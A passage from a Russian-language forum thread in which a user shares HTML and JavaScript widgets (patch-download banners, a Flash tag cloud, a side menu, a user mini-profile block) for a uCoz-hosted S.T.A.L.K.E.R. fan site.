Code
<img src=http://mystalker.at.ua/dzone.gif >


Вне Зоны.

Code
<img src=http://mystalker.at.ua/vhezoni.gif >


Пример работы скрипта вы можете видеть на нашем сайте.

#37
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Патчи на все 3 сталкера.


Code
<div style="text-align: left; font-weight: bold;"><div style="text-align: center;">S.T.A.L.K.E.R. COP<a href="http://files.gsc-game.com/stk-patches/stk-sfk-r-patch-0-2.exe"><br><img src="http://soc.stalker-game.ru/img/content/st_patch_02.gif"></a><br><a href="http://files.gsc-game.com:3128/st/cop/setup-cop-rp-any-01.exe" class="postlink" target="_blank"><img src="http://cop.stalker-game.ru/img/content/cop_st_patch_1.gif"></a><br></div><div style="text-align: center;">S.T.A.L.K.E.R. CS<br><a href="http://files.gsc-game.com/st/patches/stkcs-rus-pack-r-patch-any-10-fixed.exe" class="postlink" target="_blank"><img src="http://cs.stalker-game.ru/img/content/cs_st_patch_10.gif"></a><br></div></div><div style="text-align: center; font-weight: bold;"><a href="http://files.gsc-game.com:3128/st/patches/stkcs-rus-pack-r-patch-any-9.exe" class="postlink" target="_blank"><img src="http://stalker-cop.ru/img/patches/cs_st_patch_09_stalker-cop.ru.gif"></a><br>S.T.A.L.K.E.R. SOC<br><a href="http://narod.ru/disk/9796277000/stalker_patch_702c_rus.7z.html"><span class="postlink"><img src="http://cs.stalker-game.ru/img/content/cs_st_patch_07.gif"></span></a><br><a href="http://files.gsc-game.com:3128/st/patches/stk-sfk-r-patch-5-6.exe" class="postlink" target="_blank"><img src="http://soc.stalker-game.ru/img/content/st_patch_06.gif"></a><br><a href="http://files.gsc-game.com:3128/stk-patches/stk-sfk-r-patch-any-5.exe" class="postlink" target="_blank"><img src="http://soc.stalker-game.ru/img/content/st_patch_05.gif"></a><br><a href="http://files.gsc-game.com/stk-patches/stk-sfk-r-patch-any-4.exe" class="postlink" target="_blank"><img src="http://soc.stalker-game.ru/img/content/st_patch_04.gif"></a></div>


#38
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Облако тэгов.


Code
<div align="center"><script type="text/javascript" src="http://orlenok.do.am/swfobject.js"></script><div id="wpcumuluswidgetcontent"><p align="center">Для красивого отображения Облака   
<br>   
необходим   
<br>   
Adobe Flash Player 9   
<br>   
или выше   
<br>   
<a href="http://www.adobe.com/go/getflashplayer" target="_blank" ><font color="ff3366"><b>Скачать Adobe Flash Player</b></font></a></p></div><script type="text/javascript">var rnumber = Math.floor(Math.random()*9999999);var widget_so = new SWFObject("http://orlenok.do.am/tagcloud.swf?r="+rnumber, "tagcloudflash", "180", "190", "9", "#ffffff"); widget_so.addParam("allowScriptAccess", "always");widget_so.addVariable("tcolor", "0x636363");widget_so.addVariable("tspeed", "150");widget_so.addVariable("distr", "true");widget_so.addVariable("mode", "tags");widget_so.addVariable("tagcloud", "<tags><a href='http://ucoooz.ru/load/6' style='12'>Софт</a><a href='http://ucoooz.ru/load/18' style='12'>Все для uCoz</a><a href='http://ucoooz.ru/load/19' style='12'>Скрипты uCoz</a><a href='http://ucoooz.ru/load/20' style='12'>Шаблоны сайта</a><a href='http://ucoooz.ru/load/22' style='12'>Кнопки для форума</a><a href='http://ucoooz.ru/load/23' style='12'>Иконки групп</a><a href='http://ucoooz.ru/load/9' style='12'>Мультимедиа</a><a href='http://ucoooz.ru/load/10' style='12'>Безопасность</a><a href='http://ucoooz.ru/load/14' style='12'>Интернет</a><a href='http://ucoooz.ru/load/13' style='12'>Утилиты</a><a href='http://ucoooz.ru/load/15' style='12'>Для вебмастера</a><a href='http://ucoooz.ru/load/16' style='12'>Графика и дизайн</a><a href='http://ucoooz.ru/load/3' style='12'>Статьи для вебмастера</a><a href='http://ucoooz.ru/load/4' style='12'>SEO/Раскрутка</a><a href='http://ucoooz.ru/load/11' style='12'>Заработок в интернете</a></tags>");widget_so.write("wpcumuluswidgetcontent");</script></div>


Пример работы скрипта вы можете увидеть на главной странице нашего сайта.

#39
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Боковое меню для сталкер портала




Установить в левую часть сайта (в левый блок, первый контейнер и т.п.).

Code
<script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml2','')",500)</script>    
    <!--Stalker-Portal.Ucoz.Kz-->    
    <a href="/forum/15"> <img src="http://stalker-portal.ucoz.kz/diz2011/rpg.png" title="ФРПГ" alt="ФРПГ" border="0" style="position: fixed; bottom: 90pt; left: 0pt;"/></a>    
    <a href="/forum"> <img src="http://stalker-portal.ucoz.kz/diz2011/forum.png" title="На форум" alt="На форум" border="0" style="position: fixed; bottom: 200pt; left: 0pt;"/></a>    
    <a href="http://stalker-portal.ucoz.kz/index/8"> <img src="http://stalker-portal.ucoz.kz/diz2011/pda.png" title="Мой ПДА" alt="Мой ПДА" border="0" style="position: fixed; bottom: 300pt; left: 0pt;"/></a>    
    <!--/Stalker-Portal.Ucoz.Kz--><!--/U1DRIGHTER1Z-->    
    <center/>  


#40
Dimon02022

Dimon02022

    В поисках Клондайка

  • Не в сети
  • Проверенные
  • Старожилы

<- Информация ->
  • Регистрация:
    30-October 11
  • 974 Cообщений
  • Пропуск №: 5421


Репутация: 1254 Постов: 974
  • Страна проживания:Россия
  • Реальное имя:Дмитрий
  • Пол:Мужчина
  • Город:Санкт-Петербург, Россия
Мини профиль stalker (рип)




Что-бы установить скрипт вам надо сделать блок и туда вставить весь этот код:

Code
<div align="center"><strong>Здорово,<span style= color:#FFA100>$USERNAME$</span>!</strong>    
<br>    
       
       
    <img src="http://stalker-portal.ucoz.kz/sys/noavatar.gif" border="0" alt="" />    
       
       
    <BR>    
       
<font color="yellow"><b>"$USER_GROUP$"</b></font>    
       
<br><span style= color:green>$TIME$</span>(Сегодня <b>$DATE$</b>)   
<br>Номер пропуска:<b>$USER_ID$</b>    
<br>Полное имя: $USER_FULL_NAME$   
       
<br>Ты здесь: <font color="#FF0000"><b>$USER_REG_DAYS$</b></font>-й день    
       
<br>    
<br><a href="ссылка на ваш фрпг магазин"><img src="http://stalker-portal.ucoz.kz/magazin.png" border="0" alt="" /></a>    
<br><a href="javascript:openOnClick('users')" title="Список сталкеров"><img src="http://stalker-portal.ucoz.kz/ss.gif" alt="" border="0"></a>    
<br><a href="index/8-0"><img src="http://stalker-portal.ucoz.kz/moykpk.png" border="0" alt="" /></a>    
<br><a href="javascript:openOnClick('options')" title="Изменить инфу"><img src="http://stalker-portal.ucoz.kz/ii.gif" alt="" border="0"></a>    
<br><a href="javascript:openOnClick('send')" title="Отправить ЛС"><img src="http://stalker-portal.ucoz.kz/otls.gif" alt="" border="0"></a>    
<br><a href="javascript:openOnClick('mail')" title="Читать ЛС"><img src="http://stalker-portal.ucoz.kz/4ls.gif" alt="" border="0"><br>(<b>0</b>)</a>    
<br><a href="/index/10" title="Выход"><img src="http://stalker-portal.ucoz.kz/viiti.png" alt="" border="0"></a>   

<script language=javascript type=text/javascript>    
function openOnClick(client_type)    
{    
if(client_type=="mail")clientWindow = window.open("/index/14","pmw","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");    
if(client_type=="send")clientWindow = window.open("/index/14-999-0-1","pms","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");    
if(client_type=="options")clientWindow = window.open("/index/11","options","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");    
if(client_type=="users")clientWindow = window.open("/index/15-1","users","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");    
if(client_type=="rules")clientWindow = window.open("/rules.html","rules","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");    
}    
</script>  



Обратно в Скрипты для Сайта


Количество пользователей, читающих эту тему: 0

0 members, 0 guests, 0 anonymous users

яндекс.метрика
Button automatically alert search engines 31x31 WHOIS.UANIC.NAME - Identify traffic by Google

реклама на сайте подключена